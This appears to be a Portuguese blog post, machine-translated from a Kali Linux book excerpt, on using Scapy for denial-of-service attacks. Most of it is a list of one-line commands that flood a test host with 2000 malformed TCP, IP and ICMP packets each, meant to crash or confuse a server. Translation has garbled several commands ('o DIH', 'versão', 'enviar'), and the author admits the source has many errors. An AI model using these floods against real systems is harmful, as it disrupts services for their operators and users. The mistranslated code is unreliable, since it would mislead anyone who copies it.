segunda-feira, 10 de março de 2014

Usando o scapy para ataque dos

                                       Scapy


        Uma das ferramentas mais populares é DoS scapy. Scapy é uma ferramenta de manipulação de pacotes para redes de computadores, escrito em Python por Philippe Biondi.

        Scapy pode forjar ou decodificar pacotes, enviá-los no fio, capturá-los, e as solicitações e as respostas de jogo. Além disso, ele pode lidar com tarefas como digitalização, tracerouting, sondagem, testes de unidade, ataques, e
a descoberta de rede.

         Um truque comum é manipular pacotes TCP do Kali e enviá-lo via scapy.
Para iniciar scapy, tipo scapy na janela do terminal. Uma vez scapy foi lançado,
digitar sintaxe de comando:

Nesta tela a seguir, vamos usar scapy para enviar TCP malformado
pacotes para o nosso servidor de teste. Neste caso de uso, o nosso servidor de teste é 10.0.0.1. Este pode ser um roteador ou um servidor web. Também, vamos especificar o número de pacotes que serão enviar para o nosso destino. Neste caso estamos enviando 2000 pacotes usando o comando:
send (IP (dst = "10.0.0.1", ttl = 0) / TCP (), iface = "eth0", count = 2000)

         Na linha de comando anterior, estamos enviando 2000 pacotes a partir de nossa eth0 interface em nosso servidor Kali para o endereço de destino 10.0.0.1. Além disso, estamos enviando o alvo de um tempo para viver valor de 0. Isso é muito bonito impossível de um TCP ponto de vista.

       Essencialmente, estamos tentando confundir o servidor web com um mau TTL valor. Atacantes na vida real mandar milhões desses pacotes. Deve notar-se que um sistema sob as circunstâncias corretas pode falhar ou se tornar corruptos de uma única má ou pacote malformado. Podemos ajustar a contagem ou outros parâmetros que podem precisar de para o nosso ataque:
Aqui estão alguns outros cenários de ataque populares usados por scapy:

Bad IP versão
send (IP (dst = "10.0.0.1", src = "10.20.30.40", versão = 0) /
TCP (dport = "www"), iface = "eth0", count = 2000)

Bad TCP checksum
send (IP (dst = "10.0.0.1") / TCP (chksum = 0x5555), iface = "eth0", count = 2000)

Bad TCP Flags (tudo esclarecido e SEQ # == 0)
send (IP (dst = "10.0.0.1") / TCP (flags = "", seq = 555), iface = "eth0",
count = 2000)

Bandeiras Bad TCP (All Flags Set)
send (IP (dst = "10.0.0.1") / TCP (flags = 0x0ff), iface = "eth0", count = 2000)

FIN único conjunto
send (IP (dst = "10.0.0.1") / TCP (flags = "F"), iface = "eth0", count = 2000)

Length> L2 Comprimento
send (IP (dst = "10.0.0.1", src = "10.20.30.40", o DIH = 15L) / TCP (dport = "www"), iface = "eth0", count = 2000)

Comprimento Header Too Short
send (IP (dst = "10.0.0.1", src = "10.20.30.40", o DIH = 2L) / TCP (dport = "www"), iface = "eth0", count = 2000)

ICMP Flood
send (IP (dst = "10.0.0.1") / ICMP (), iface = "eth0", count = 2000)

IP erro de checksum
send (IP (dst = "10.0.0.1", src = "10.20.30.40", chksum = 0x5500) / TCP (dport = "www"), iface = "eth0", count = 2000)

IP Fragment
send (IP (dst = "10.0.0.1", src = "10.20.30.40", frag = 1) / TCP (dport = "www"),iface = "eth0", count = 2000)

IP Comprimento> L2 Comprimento
send (IP (dst = "10.0.0.1", src = "10.20.30.40", o DIH = 5L, len = 80) /
TCP (dport = "www"), iface = "eth0", count = 2000)

Fonte endereço IP == Destination Address
send (IP (dst = "10.0.0.1", src = "10.0.0.1") / TCP (dport = "www"),
iface = "eth0", count = 2000)

L2 Comprimento >> IP Comprimento
send (IP (dst = "10.0.0.1", len = 32) / Raw (load = "bla-bla-bla-bla-bla-bla-
bla-bla "), iface =" eth0 ", count = 2000)

No L4
send (IP (dst = "10.0.0.1", src = "10.20.30.40"), iface = "eth0," count = 2000)

SYN && FIN Set
enviar (IP (dst = "10.0.0.1") / TCP (flags = "FS"), iface = "eth0", count = 2000)

Pedaço retirado do livro kali linux tem muitas coisas erradas assim que quiser conserto

0 comentários:

Postar um comentário